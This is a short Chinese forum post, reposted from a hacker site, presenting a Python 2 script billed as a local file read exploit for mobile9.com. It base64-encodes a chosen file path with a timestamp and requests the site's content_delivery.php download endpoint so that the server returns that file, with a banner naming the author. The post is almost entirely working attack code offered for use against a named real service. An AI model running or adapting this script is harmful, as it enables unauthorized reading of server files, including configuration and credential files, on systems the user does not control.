|
发表于 2010-1-29 11:08:51
|显示全部楼层
因为他是base64编码的手工测试很麻烦就写了个小工具,高手飘过
import urllib2,sys
import httplib
import base64,time
if len(sys.argv) <= 2:
print "=" * 30
print "mobile9.com local exploit by cnb|rd Qq:441303228"
print "Email:Linuxrootkit2008@gmail.com"
print "=" * 30
print
print "usage: " + sys.argv[0] + " hostname " + " local file "
print
sys.exit(1)
host = sys.argv[1]
path = sys.argv[2]
file = sys.argv[3]
h = httplib.HTTP(host)
h.putrequest("HEAD", path)
h.putheader("Host", host)
h.endheaders()
okresp, reason, headers = h.getreply()
print "=" * 30
print host + " Server Banner is " + headers.get("Server")
print "=" * 30
print "Local file to read is " + file
time = int(time.time())
serverpath = "/download/content_delivery.php?key="
str = str(file) + "|" + str(time) + "|"
print str
base64file = base64.urlsafe_b64encode(str)
requestpath = serverpath + base64file
print base64file
print requestpath
f = httplib.HTTPConnection(host)
f.request('GET', requestpath)
print f.getresponse().read()
f.close
CSDN博客cnbird2008
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2010-01-28/59150.html |
|